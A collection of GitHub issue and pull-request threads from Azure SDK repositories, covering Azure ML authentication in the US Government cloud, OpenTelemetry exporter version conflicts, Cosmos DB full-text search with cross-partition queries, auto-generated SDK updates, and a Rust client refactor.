Below is my latest attempt.
First I make sure that the authentication works (replacing the placeholder values with the correct values)
from azure.ai.ml.entities import AmlCompute
from azure.ai.ml import MLClient
from azure.identity import DefaultAzureCredential, AzureAuthorityHosts
import os
# Set ENV Variables
os.environ["AZURE_USERNAME"] = "xxxxxxxxx"
os.environ["AZURE_PASSWORD"] = "xxxxxxxxx"
os.environ["AZURE_TENANT_ID"] = "xxxxxxxxxx"
kwargs = {"cloud": "AzureUSGovernment"}
credentials = DefaultAzureCredential(authority=AzureAuthorityHosts.AZURE_GOVERNMENT)
credentials.get_token("https://management.usgovcloudapi.net/.default")
This results in a successful authentication and token retrieval.
But then running the below command, after putting in the correct subscription ID, using the ML Client errors out.
ml_client = MLClient(
credential=credentials,
subscription_id="xxxxxxxxx",
resource_group_name="xxxxxxxx",
workspace_name="xxxxxxx",
**kwargs,
)
print(ml_client)
# Get a list of workspaces in a resource group
for ws in ml_client.workspaces.list():
print(ws.name, ":", ws.location, ":", ws.description)
error is
ResourceNotFoundError: (SubscriptionNotFound) The subscription '50ff9458-6372-4522-8227-327043deaef5' could not be found.
Code: SubscriptionNotFound
Message: The subscription '50ff9458-6372-4522-8227-327043deaef5' could not be found.
I can perform the following in an Azure US Gov ML Studio notebook targeting Python 3.10 - SDK V2 (default Compute) and it works.
It seems a default version of azure-ai-ml (2.4.1) is installed, which might be causing some issues.
---------CELL 1---------
pip list | grep azure
Output:
azure-ai-ml 2.4.1
azure-common 1.1.28
azure-core 1.22.1
azure-identity 1.10.0
azure-mgmt-core 1.3.0
azure-ml 2.3.1
azure-storage-blob 12.9.0
azure-storage-file-share 12.7.0
Note: you may need to restart the kernel to use updated packages.
---------CELL 2---------
pip uninstall azure-ai-ml azure-ml -y
Output:
Found existing installation: azure-ai-ml 2.4.1
Uninstalling azure-ai-ml-2.4.1:
Successfully uninstalled azure-ai-ml-2.4.1
Found existing installation: azure-ml 2.3.1
Uninstalling azure-ml-2.3.1:
Successfully uninstalled azure-ml-2.3.1
Note: you may need to restart the kernel to use updated packages.
---------CELL 3---------
pip install --pre azure-ai-ml
Output:
Collecting azure-ai-ml
Downloading azure_ai_ml-1.0.0-py3-none-any.whl (4.0 MB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 4.0/4.0 MB 55.9 MB/s eta 0:00:00:00:010:01
Collecting azure-storage-blob<13.0.0,>=12.10.0
Downloading azure_storage_blob-12.14.1-py3-none-any.whl (383 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 383.2/383.2 kB 28.9 MB/s eta 0:00:00
Requirement already satisfied: azure-mgmt-core<2.0.0,>=1.3.0 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from azure-ai-ml) (1.3.0)
Requirement already satisfied: azure-common<2.0.0,>=1.1 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from azure-ai-ml) (1.1.28)
Requirement already satisfied: msrest>=0.6.18 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from azure-ai-ml) (0.6.21)
Collecting strictyaml<=1.6.1
Downloading strictyaml-1.6.1.tar.gz (137 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 137.7/137.7 kB 11.9 MB/s eta 0:00:00
Preparing metadata (setup.py) ... done
Requirement already satisfied: azure-core!=1.22.0,<2.0.0,>=1.8.0 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from azure-ai-ml) (1.22.1)
Requirement already satisfied: pydash<6.0.0 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from azure-ai-ml) (4.9.0)
Requirement already satisfied: pyyaml<7.0.0,>=5.1.0 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from azure-ai-ml) (6.0)
Requirement already satisfied: colorama<=0.4.4 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from azure-ai-ml) (0.4.4)
Collecting azure-storage-file-datalake<13.0.0
Downloading azure_storage_file_datalake-12.9.1-py3-none-any.whl (238 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 238.8/238.8 kB 23.0 MB/s eta 0:00:00
Requirement already satisfied: tqdm<=4.63.0 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from azure-ai-ml) (4.63.0)
Requirement already satisfied: pyjwt<3.0.0 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from azure-ai-ml) (2.3.0)
Requirement already satisfied: marshmallow<4.0.0,>=3.5 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from azure-ai-ml) (3.17.0)
Requirement already satisfied: typing-extensions<5.0.0 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from azure-ai-ml) (<IP_ADDRESS>)
Requirement already satisfied: azure-storage-file-share<13.0.0 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from azure-ai-ml) (12.7.0)
Requirement already satisfied: isodate in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from azure-ai-ml) (0.6.1)
Requirement already satisfied: jsonschema<5.0.0,>=4.0.0 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from azure-ai-ml) (4.13.0)
Requirement already satisfied: six>=1.11.0 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from azure-core!=1.22.0,<2.0.0,>=1.8.0->azure-ai-ml) (1.16.0)
Requirement already satisfied: requests>=2.18.4 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from azure-core!=1.22.0,<2.0.0,>=1.8.0->azure-ai-ml) (2.28.1)
Requirement already satisfied: cryptography>=2.1.4 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from azure-storage-blob<13.0.0,>=12.10.0->azure-ai-ml) (37.0.4)
Collecting msrest>=0.6.18
Downloading msrest-0.7.1-py3-none-any.whl (85 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 85.4/85.4 kB 10.9 MB/s eta 0:00:00
Collecting azure-core!=1.22.0,<2.0.0,>=1.8.0
Downloading azure_core-1.26.0-py3-none-any.whl (178 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 178.9/178.9 kB 21.4 MB/s eta 0:00:00
Collecting typing-extensions<5.0.0
Downloading typing_extensions-4.4.0-py3-none-any.whl (26 kB)
Requirement already satisfied: pyrsistent!=0.17.0,!=0.17.1,!=0.17.2,>=0.14.0 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from jsonschema<5.0.0,>=4.0.0->azure-ai-ml) (0.18.1)
Requirement already satisfied: attrs>=17.4.0 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from jsonschema<5.0.0,>=4.0.0->azure-ai-ml) (22.1.0)
Requirement already satisfied: packaging>=17.0 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from marshmallow<4.0.0,>=3.5->azure-ai-ml) (21.3)
Requirement already satisfied: requests-oauthlib>=0.5.0 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from msrest>=0.6.18->azure-ai-ml) (1.3.1)
Requirement already satisfied: certifi>=2017.4.17 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from msrest>=0.6.18->azure-ai-ml) (2022.6.15)
Requirement already satisfied: python-dateutil>=2.6.0 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from strictyaml<=1.6.1->azure-ai-ml) (2.8.2)
Requirement already satisfied: cffi>=1.12 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from cryptography>=2.1.4->azure-storage-blob<13.0.0,>=12.10.0->azure-ai-ml) (1.15.1)
Requirement already satisfied: pyparsing!=3.0.5,>=2.0.2 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from packaging>=17.0->marshmallow<4.0.0,>=3.5->azure-ai-ml) (3.0.9)
Requirement already satisfied: urllib3<1.27,>=1.21.1 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from requests>=2.18.4->azure-core!=1.22.0,<2.0.0,>=1.8.0->azure-ai-ml) (1.26.11)
Requirement already satisfied: charset-normalizer<3,>=2 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from requests>=2.18.4->azure-core!=1.22.0,<2.0.0,>=1.8.0->azure-ai-ml) (2.1.0)
Requirement already satisfied: idna<4,>=2.5 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from requests>=2.18.4->azure-core!=1.22.0,<2.0.0,>=1.8.0->azure-ai-ml) (3.3)
Requirement already satisfied: oauthlib>=3.0.0 in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from requests-oauthlib>=0.5.0->msrest>=0.6.18->azure-ai-ml) (3.2.0)
Requirement already satisfied: pycparser in /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages (from cffi>=1.12->cryptography>=2.1.4->azure-storage-blob<13.0.0,>=12.10.0->azure-ai-ml) (2.21)
Building wheels for collected packages: strictyaml
Building wheel for strictyaml (setup.py) ... done
Created wheel for strictyaml: filename=strictyaml-1.6.1-py3-none-any.whl size=123931 sha256=7f10357971c55b3c29d2dbee29b816db58830ad42ac89258d28bd87636c1f5a7
Stored in directory: /home/azureuser/.cache/pip/wheels/fb/ca/49/3c5046dee736c4c938048ce89b236b1643ea83178517b5f88a
Successfully built strictyaml
Installing collected packages: typing-extensions, strictyaml, azure-core, msrest, azure-storage-blob, azure-storage-file-datalake, azure-ai-ml
Attempting uninstall: typing-extensions
Found existing installation: typing-extensions <IP_ADDRESS>
Uninstalling typing-extensions-<IP_ADDRESS>:
Successfully uninstalled typing-extensions-<IP_ADDRESS>
Attempting uninstall: azure-core
Found existing installation: azure-core 1.22.1
Uninstalling azure-core-1.22.1:
Successfully uninstalled azure-core-1.22.1
Attempting uninstall: msrest
Found existing installation: msrest 0.6.21
Uninstalling msrest-0.6.21:
Successfully uninstalled msrest-0.6.21
Attempting uninstall: azure-storage-blob
Found existing installation: azure-storage-blob 12.9.0
Uninstalling azure-storage-blob-12.9.0:
Successfully uninstalled azure-storage-blob-12.9.0
Successfully installed azure-ai-ml-1.0.0 azure-core-1.26.0 azure-storage-blob-12.14.1 azure-storage-file-datalake-12.9.1 msrest-0.7.1 strictyaml-1.6.1 typing-extensions-4.4.0
Note: you may need to restart the kernel to use updated packages.
---------CELL 4---------
import logging
import requests
import os
from azure.ai.ml import MLClient
from azure.identity import AzureAuthorityHosts, DefaultAzureCredential
from azure.ai.ml.entities import Workspace
subscription_id = "YOUR_VALUE_HERE"
resource_group = "YOUR_VALUE_HERE"
workspace_name = "YOUR_VALUE_HERE"
logging.basicConfig()
logging.getLogger().setLevel(logging.DEBUG)
try:
credential = DefaultAzureCredential(authority=AzureAuthorityHosts.AZURE_GOVERNMENT)
except Exception as ex:
raise ex
print(credential)
try:
kwargs = {"cloud": "AzureUSGovernment"}
ml_client = MLClient(credential, subscription_id, resource_group, **kwargs)
except Exception as ex:
raise ex
print(ml_client)
# Get a list of workspaces in a resource group
for ws in ml_client.workspaces.list():
print(ws.name, ":", ws.location, ":", ws.description)
Could you please try to login to azure cli from the same machine from where you are running the notebooks and set the default subscription?
az cloud set -n AzureUSGovernment
az account set -s <SUBSCRIPTION-ID>
This should set the default subscription for you on the machine.
I have tried the following code snippet in Government cloud, and this is working with azure-ai-ml==1.0.0.
Had to update the call to create compute by appending .result() for LRO poller.
from azure.ai.ml.entities import AmlCompute
from azure.ai.ml import MLClient
from azure.identity import DefaultAzureCredential, AzureAuthorityHosts
import traceback
# Enter details of your subscription
subscription_id = "SOME-SUBSCRITION-ID-IN-GOVT-CLOUD"
resource_group = "test-rg-221005"
workspace_name = "est-usgovvirginia"
credentials = DefaultAzureCredential(authority=AzureAuthorityHosts.AZURE_GOVERNMENT)
ml_client = MLClient(
credential=credentials,
subscription_id=subscription_id,
resource_group_name=resource_group,
workspace_name=workspace_name,
cloud="AzureUSGovernment",
)
# Name assigned to the compute cluster
cpu_compute_target = "cpu-cluster-3"
try:
# let's see if the compute target already exists
cpu_cluster = ml_client.compute.get(cpu_compute_target)
print(
f"You already have a cluster named {cpu_compute_target}, we'll reuse it as is."
)
except Exception:
print("Creating a new cpu compute target...")
# Let's create the Azure ML compute object with the intended parameters
cpu_cluster = AmlCompute(
name=cpu_compute_target,
# Azure ML Compute is the on-demand VM service
type="amlcompute",
# VM Family
size="STANDARD_DS3_V2",
# Minimum running nodes when there is no job running
min_instances=0,
# Nodes in cluster
max_instances=4,
# How many seconds will the node running after the job termination
idle_time_before_scale_down=180,
# Dedicated or LowPriority. The latter is cheaper but there is a chance of job termination
tier="Dedicated",
)
# Now, we pass the object to MLClient's create_or_update method
cpu_cluster = ml_client.compute.begin_create_or_update(cpu_cluster).result()
print(
f"AMLCompute with name {cpu_cluster.name} is created, the compute size is {cpu_cluster.size}"
)
Returned the following:
Creating a new cpu compute target...
AMLCompute with name cpu-cluster-3 is created, the compute size is STANDARD_DS3_V2
@adrian-gonzalez : I created a new Conda environment, installed the GA version of the SDK (1.0.0), and tried running the notebook in the usgovvirginia region to repro this issue, but unfortunately I was not able to reproduce it after I configured the cloud name and account using the CLI.
az cloud set -n AzureUSGovernment
az account set -s <SUBSCRIPTION-ID>
By default, the SDK or CLI tries to connect to public cloud.
Hi @harneetvirk -
Please read through our previous comments.
The steps to reproduce the issue lie with azure-ai-ml v2.4.1.
It is this version that is the default when we are creating an instance of Azure Machine Learning, and it is therefore preventing our team from using this Python package.
azure-ai-ml v2.4.1 has some known issues; it will be removed from the CI image in the next release and replaced with azure-ai-ml 1.0.0 from PyPI. To unblock, please install azure-ai-ml 1.0.0 from PyPI.
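For reference, the unblock amounts to the same commands shown in the notebook cells earlier in this thread (illustrative; run in the affected environment):
pip uninstall -y azure-ai-ml azure-ml
pip install azure-ai-ml==1.0.0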
Thank you @harneetvirk . We can do that as a temporary workaround.
When is the next release slated for?
Can you confirm that once azure-ai-ml v2.4.1 is removed from the CI image, newly created AML instances won't have this issue moving forward?
I just want to be sure that, from a developer-experience standpoint, teams creating new AML instances don't always have to manually downgrade the azure-ai-ml package to 1.0.0.
@xiangyan99 can you or @harneetvirk provide guidance on the remaining above questions? I would like to confirm that the issue is resolved and that the steps to reproduce no longer result in the issue prior to closing this issue out.
@adrian-gonzalez if you don't mind, could you open a new issue with the questions?
Thanks.
@xiangyan99 That doesn't seem efficient; are you sure we want to go that route? It would effectively be a copy of this issue, since we wouldn't want to duplicate the steps to reproduce and the discussion.
Happy to do that if that's the approach
/unresolve
@xiangyan99 can you or @harneetvirk provide guidance on the remaining above questions? I would like to confirm that the issue is resolved and that the steps to reproduce no longer result in the issue prior to closing this issue out.
The new CI image has been released with SDK v2 package installed from pypi. Please create a new Compute Instance.
Thanks @harneetvirk!
|
2025-04-01T06:36:45.469410
| 2022-12-10T02:06:06
|
1487792278
|
{
"authors": [
"jabbera",
"jeremydvoss",
"kashifkhan"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:361",
"repo": "Azure/azure-sdk-for-python",
"url": "https://github.com/Azure/azure-sdk-for-python/issues/27900"
}
|
gharchive/issue
|
azure-monitor-opentelemetry-exporter not compatible with latest opentelemetry-[api/sdk] 1.15.0
Package Name: azure-monitor-opentelemetry-exporter
Package Version: 1.0.0b10
Operating System: Linux
Python Version: 3.10
Describe the bug
not compatible with opentelemetry-[api/sdk] 1.15.0
To Reproduce
Steps to reproduce the behavior:
pip install azure-monitor-opentelemetry-exporter
python3.10
from azure.monitor.opentelemetry.exporter import AzureMonitorLogExporter, AzureMonitorTraceExporter
see:
.tox/py310-sqlalchemy14-integration/lib/python3.10/site-packages/gmo/core/util/telemetry/__init__.py:8: in <module>
from azure.monitor.opentelemetry.exporter import AzureMonitorLogExporter, AzureMonitorTraceExporter
.tox/py310-sqlalchemy14-integration/lib/python3.10/site-packages/azure/monitor/opentelemetry/exporter/__init__.py:7: in <module>
from azure.monitor.opentelemetry.exporter.export.logs._exporter import AzureMonitorLogExporter
.tox/py310-sqlalchemy14-integration/lib/python3.10/site-packages/azure/monitor/opentelemetry/exporter/export/logs/_exporter.py:8: in <module>
from opentelemetry.sdk._logs.severity import SeverityNumber
E ModuleNotFoundError: No module named 'opentelemetry.sdk._logs.severity'
Expected behavior
import to work
Screenshots
If applicable, add screenshots to help explain your problem.
Additional context
Add any other context about the problem here.
Thank you for your feedback @jabbera . We will investigate asap and get back to you
The PR is merged. However, since this is an ongoing issue, let's keep this open until the next release. I am looking into whether we can do a release before January. In the meantime, use OTel 1.14
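One possible way to follow that advice while staying on the current exporter (the version pins below are illustrative):
pip install "azure-monitor-opentelemetry-exporter==1.0.0b10" "opentelemetry-sdk<=1.14.0" "opentelemetry-api<=1.14.0"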
There's another issue: when using the fixed version of the exporter with OTel 1.15, I consistently get the following warning:
...\site-packages\werkzeug\serving.py:716: ResourceWarning: unclosed <socket.socket fd=1304, family=AddressFamily.AF_INET, type=SocketKind.SOCK_STREAM, proto=0> self.socket = socket.fromfd(fd, address_family, socket.SOCK_STREAM) ResourceWarning: Enable tracemalloc to get the object allocation traceback
I've determined that no commit in exporter 1.0.0b11 has caused this; it's too early to know the root cause. But it seems to be an issue with how opentelemetry-instrumentation-flask==0.36b0 or opentelemetry-instrumentation-wsgi==0.36b0 use Werkzeug. I've confirmed the fixed version of the exporter does still send telemetry correctly. However, since the new version needs to be pinned to OTel 1.15, we'd be encouraging people to use 1.15, which seems to have some issue that needs to be addressed.
I am not able to release the exporter as is because of the memory issue with OTel 1.15. Instead, we can pin the exporter to 1.12<=x<=1.14 before the module path was changed. That way, we can avoid the memory allocation issue as well as the severity import breaking change.
My release PR is approved. But my understanding is others have the exclusive permissions to merge it and trigger the release pipeline.
https://github.com/Azure/azure-sdk-for-python/pull/27958
@jabbera Please use newly released 1.0.0b11. It blocks OTel 1.15. Resolving issue.
|
2025-04-01T06:36:45.477327
| 2024-12-12T19:19:33
|
2736699898
|
{
"authors": [
"Pilchie",
"sachintha180",
"simorenoh"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:362",
"repo": "Azure/azure-sdk-for-python",
"url": "https://github.com/Azure/azure-sdk-for-python/issues/38857"
}
|
gharchive/issue
|
Do Azure Cosmos DB full text functions (FullTextContains, FullTextScore, etc.) not support cross partition queries?
Hi, I'm trying to understand if Full Text Search (in the Azure Cosmos DB Python SDK) isn't supported across partitions.
I'm led to believe this as a result of the following:
When I run this query to get a few documents from my Azure Cosmos DB collection using Full Text Search, where I provide the partition key (no cross partition querying enabled):
summary_nodes = self.cosmos.query_items(
query="""
SELECT c.id, c.text
FROM c
ORDER BY RANK FullTextScore(c.text, @text)
""",
partition_key="cbd31f95-a3a6-4a85-ba8a-67925980d37c",
parameters=[
{"name": "@text", "value": text},
],
verbose=True,
)
print(summary_nodes)
I get the desired output:
[{'id': 'cbd31f95-a3a6-4a85-ba8a-67925980d37c', 'text': "The letter dated 11th October 2024...."}]
However, when I run the exact same query without providing the partition key with cross partition querying enabled:
summary_nodes = self.cosmos.query_items(
query="""
SELECT c.id, c.text
FROM c
ORDER BY RANK FullTextScore(c.text, @text)
""",
parameters=[
{"name": "@text", "value": text},
],
verbose=True,
enable_cross_partition_query=True,
)
print(summary_nodes)
I'm met with the following error:
{"code":"BadRequest","message":"One of the input values is invalid.\r\nActivityId: 9c5f1c20-e0eb-4dcd-b965-c404a2af537b, Windows/10.0.20348 cosmos-netstandard-sdk/3.18.0"}
I've set up all indexing policies + full text policies correctly (as evident by the working code snippet).
Here are the policies for reference:
full_text_policy = {
"defaultLanguage": "en-US",
"fullTextPaths": [{"path": "/text", "language": "en-US"}],
}
# Reference: https://learn.microsoft.com/en-us/azure/cosmos-db/index-policy
indexing_policy = {
"indexingMode": "consistent",
"automatic": True,
"includedPaths": [
{
"path": "/*",
}
],
"excludedPaths": [{"path": '/"_etag"/?', "path": "/vector/*"}],
"fullTextIndexes": [
{
"path": "/text",
}
],
"vectorIndexes": [
{
"path": "/vector",
"type": "quantizedFlat",
}
],
}
In the above code snippets, I've used my own self.cosmos.query_items function - which is a function that shadows the Azure Cosmos Python SDK's container.query_items function, as follows:
def query_items(
self,
query: str,
partition_key: str | None = None,
verbose=False,
parameters: List[Dict[str, object]] | None = None,
**kwargs,
):
try:
items = list(
self.container.query_items(
query=query,
parameters=parameters,
partition_key=partition_key,
**kwargs,
)
)
if verbose:
print("[AZCOSMOSDB]\tFound {0} items".format(len(items)))
return items
except exceptions.CosmosHttpResponseError as e:
if verbose:
print("[AZCOSMOSDB]\tCannot query items.")
print(e.http_error_message)
Looking forward to any clarification - thank you for your time!
@simorenoh - can you take a look?
Hi @sachintha180, thank you for opening this issue. This is actually a known gap in the FTS query feature for the service currently - parametrized cross partition queries using Order By Rank will not work. We are currently working on fixing this.
However, you can still get cross partition queries to work with FTS by sending the entire query directly, ie
query="SELECT c.id, c.text FROM c ORDER BY RANK FullTextScore(c.text, ['text-here']) ", or using string formatting directly using either %s or Python's .format string method on the query before sending it.
Do let me know if this answers your question or if there's anything else you need help with - I can also ping in this issue again once we have merged the fix on our end if you'd like.
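A minimal sketch of that workaround (editorial illustration, not from the thread): the endpoint, key, database, and container names are placeholders, and the sanitization shown is only an example to reduce injection risk when formatting the query string directly.
import re
from azure.cosmos import CosmosClient

client = CosmosClient("<endpoint>", credential="<key>")
container = client.get_database_client("<db>").get_container_client("<container>")

def safe_term(text: str) -> str:
    # Naive allow-list sanitization; tighten as needed for your data.
    return re.sub(r"[^\w\s-]", "", text)

query = (
    "SELECT c.id, c.text FROM c "
    "ORDER BY RANK FullTextScore(c.text, ['{0}'])".format(safe_term("letter"))
)
items = list(container.query_items(query=query, enable_cross_partition_query=True))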
It definitely does! I was a bit hesitant to use string formatting due to SQL injection, but I'll write a few checks to guard against it prior to formatting the query.
Thank you very much, looking forward to a ping when the issue is merged. Thank you for your time!
|
2025-04-01T06:36:45.493280
| 2017-12-14T18:52:36
|
282202846
|
{
"authors": [
"AutorestCI",
"codecov-io"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:363",
"repo": "Azure/azure-sdk-for-python",
"url": "https://github.com/Azure/azure-sdk-for-python/pull/1710"
}
|
gharchive/pull-request
|
[Monitor] Add Public Preview APIs of Metric Baseline
Generated from RestAPI PR: https://github.com/Azure/azure-rest-api-specs/pull/2049
Codecov Report
Merging #1710 into master will decrease coverage by 0.03%.
The diff coverage is 41.39%.
@@ Coverage Diff @@
## master #1710 +/- ##
==========================================
- Coverage 55.33% 55.29% -0.04%
==========================================
Files 4202 4215 +13
Lines 100158 100436 +278
==========================================
+ Hits 55422 55540 +118
- Misses 44736 44896 +160
Impacted Files | Coverage Δ
...itor/azure/mgmt/monitor/models/retention_policy.py | 62.5% <0%> (-8.93%) :arrow_down:
...iagnostic_settings_category_resource_collection.py | 66.66% <0%> (-13.34%) :arrow_down:
...nitor/azure/mgmt/monitor/models/metric_settings.py | 50% <0%> (-5.56%) :arrow_down:
...tor/azure/mgmt/monitor/models/autoscale_profile.py | 45.45% <0%> (-4.55%) :arrow_down:
...onitor/azure/mgmt/monitor/models/scale_capacity.py | 55.55% <0%> (-6.95%) :arrow_down:
...t-monitor/azure/mgmt/monitor/models/time_window.py | 55.55% <0%> (-6.95%) :arrow_down:
...mt-monitor/azure/mgmt/monitor/models/recurrence.py | 62.5% <0%> (-8.93%) :arrow_down:
...-monitor/azure/mgmt/monitor/models/sms_receiver.py | 50% <0%> (-5.56%) :arrow_down:
...-monitor/azure/mgmt/monitor/models/scale_action.py | 50% <0%> (-5.56%) :arrow_down:
...mt-monitor/azure/mgmt/monitor/models/scale_rule.py | 62.5% <0%> (-8.93%) :arrow_down:
... and 81 more
Continue to review full report at Codecov.
Legend - Click here to learn more
Δ = absolute <relative> (impact), ø = not affected, ? = missing data
Powered by Codecov. Last update 0c191e5...ae48b11. Read the comment docs.
|
2025-04-01T06:36:45.495628
| 2018-05-30T23:11:16
|
327930993
|
{
"authors": [
"AutorestCI"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:364",
"repo": "Azure/azure-sdk-for-python",
"url": "https://github.com/Azure/azure-sdk-for-python/pull/2668"
}
|
gharchive/pull-request
|
[AutoPR network/resource-manager] reverted methods removal
Created to sync https://github.com/Azure/azure-rest-api-specs/pull/3163
(message created by the CI based on PR content)
This PR has been merged into https://github.com/Azure/azure-sdk-for-python/pull/2376
|
2025-04-01T06:36:45.500832
| 2023-08-31T18:14:08
|
1876049881
|
{
"authors": [
"azure-sdk",
"nemanjarajic"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:365",
"repo": "Azure/azure-sdk-for-python",
"url": "https://github.com/Azure/azure-sdk-for-python/pull/31903"
}
|
gharchive/pull-request
|
Schedule operations rewire for feature and custom
Description
Please add an informative description that covers the changes made by the pull request and link all relevant issues.
If an SDK is being regenerated based on a new swagger spec, a link to the pull request containing these swagger spec changes has been included above.
All SDK Contribution checklist:
[ ] The pull request does not introduce [breaking changes]
[ ] CHANGELOG is updated for new features, bug fixes or other significant changes.
[ ] I have read the contribution guidelines.
General Guidelines and Best Practices
[ ] Title of the pull request is clear and informative.
[ ] There are a small number of commits, each of which have an informative message. This means that previously merged commits do not appear in the history of the PR. For more information on cleaning up the commits in your PR, see this page.
Testing Guidelines
[ ] Pull request includes test coverage for the included changes.
API change check
APIView has identified API level changes in this PR and created following API reviews.
azure-ai-ml
|
2025-04-01T06:36:45.503202
| 2023-09-23T01:14:29
|
1909657110
|
{
"authors": [
"azure-sdk"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:366",
"repo": "Azure/azure-sdk-for-python",
"url": "https://github.com/Azure/azure-sdk-for-python/pull/32202"
}
|
gharchive/pull-request
|
[AutoRelease] t2-cosmosdb-2023-09-23-46388(can only be merged by SDK owner)
https://github.com/Azure/sdk-release-request/issues/4551
Live test success
https://dev.azure.com/azure-sdk/internal/_build?definitionId=984
BuildTargetingString
azure-mgmt-cosmosdb
Skip.CreateApiReview
true
issue link:https://github.com/Azure/sdk-release-request/issues/4551
|
2025-04-01T06:36:45.521429
| 2019-02-20T23:12:50
|
412673365
|
{
"authors": [
"AutorestCI",
"codecov-io"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:367",
"repo": "Azure/azure-sdk-for-python",
"url": "https://github.com/Azure/azure-sdk-for-python/pull/4396"
}
|
gharchive/pull-request
|
[AutoPR datafactory/resource-manager] [Datafactory] Support create pipeline run with recovery mode
Created to sync https://github.com/Azure/azure-rest-api-specs/pull/5239
(message created by the CI based on PR content)
Codecov Report
Merging #4396 into restapi_auto_datafactory/resource-manager will increase coverage by 1.16%.
The diff coverage is 52.49%.
@@ Coverage Diff @@
## restapi_auto_datafactory/resource-manager #4396 +/- ##
=============================================================================
+ Coverage 52.28% 53.44% +1.16%
=============================================================================
Files 10470 10284 -186
Lines 226922 215872 -11050
=============================================================================
- Hits 118640 115380 -3260
+ Misses 108282 100492 -7790
Impacted Files | Coverage Δ
...ry/azure/mgmt/datafactory/models/vertica_source.py | 62.5% <ø> (ø) :arrow_up:
...ory/azure/mgmt/datafactory/models/impala_source.py | 62.5% <ø> (ø) :arrow_up:
...y/azure/mgmt/datafactory/models/mongo_db_source.py | 62.5% <ø> (ø) :arrow_up:
...zure/mgmt/datafactory/models/service_now_source.py | 62.5% <ø> (ø) :arrow_up:
.../azure/mgmt/datafactory/models/file_system_sink.py | 62.5% <ø> (ø) :arrow_up:
.../datafactory/models/document_db_collection_sink.py | 62.5% <ø> (ø) :arrow_up:
...ctory/azure/mgmt/datafactory/models/xero_source.py | 62.5% <ø> (ø) :arrow_up:
...tory/azure/mgmt/datafactory/models/drill_source.py | 62.5% <ø> (ø) :arrow_up:
...ctory/azure/mgmt/datafactory/models/oracle_sink.py | 62.5% <ø> (ø) :arrow_up:
...zure/mgmt/datafactory/models/azure_table_source.py | 55.55% <ø> (ø) :arrow_up:
... and 617 more
Continue to review full report at Codecov.
Legend - Click here to learn more
Δ = absolute <relative> (impact), ø = not affected, ? = missing data
Powered by Codecov. Last update 51a2757...a6e1d5b. Read the comment docs.
This PR has been merged into https://github.com/Azure/azure-sdk-for-python/pull/4381
|
2025-04-01T06:36:45.525087
| 2020-11-19T10:38:52
|
746456167
|
{
"authors": [
"MindFlavor",
"rylev"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:368",
"repo": "Azure/azure-sdk-for-rust",
"url": "https://github.com/Azure/azure-sdk-for-rust/pull/88"
}
|
gharchive/pull-request
|
Simplify ConsistencyLevel and CosmosStruct
@thomastaylor312 and I are looking into simplifying the cosmos crate. This PR contains changes to two types that are indicative of the larger changes we would like to make.
In general these changes favor concrete types over traits. Some additional changes I'd like to make include but are not limited to:
Remove the CosmosClient trait and rename CosmosStruct to CosmosClient.
Change the hyper_client field of CosmosStruct to client and make it a Box<dyn Client>. This is somewhat dependent on other work to abstract the client usage so implementations are not dependent on a particular http implementation.
Consolidate all the clients into one client CosmosClient (aka CosmosStruct)
